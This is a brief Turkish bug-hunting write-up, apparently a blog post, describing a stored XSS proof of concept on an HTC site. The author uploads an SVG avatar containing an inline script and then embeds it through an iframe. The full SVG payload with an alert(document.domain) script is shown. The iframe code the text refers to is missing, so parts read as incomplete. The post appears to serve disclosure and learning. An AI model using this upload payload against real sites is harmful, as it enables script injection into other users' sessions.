HTC Stored XSS PoC - Xss Nasıl Yapılır ?

HTC Stored XSS PoC - Xss Nasıl Yapılır ?

Öncelikle siteye girdim benim en sevdiğim olay avatar upload yerinden farklı uzantı jpg png harici birşey dahil etmek genelde svg uzantısını engellemeyi unutuyorlar.

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg>

Yukardaki kodu svg.svg olarak farklı kaydedip uploadladık. Yeni sekmede çalıştırdık çalıştı ama bir sorun var.
Kod cloud sunucudan çalışıyor yani bir manası yok ama bunu convert etmeyi düşündüm.

Yukardaki kod svgyi çalıştırıyor iframe ile beraber. Url linkinden bağlantı ekler gibi kodu ekledik.
Böyle oluna her ne kadar alert amazon clouddan çalışsada sayfada stored olduğu için geçerli hale geldi.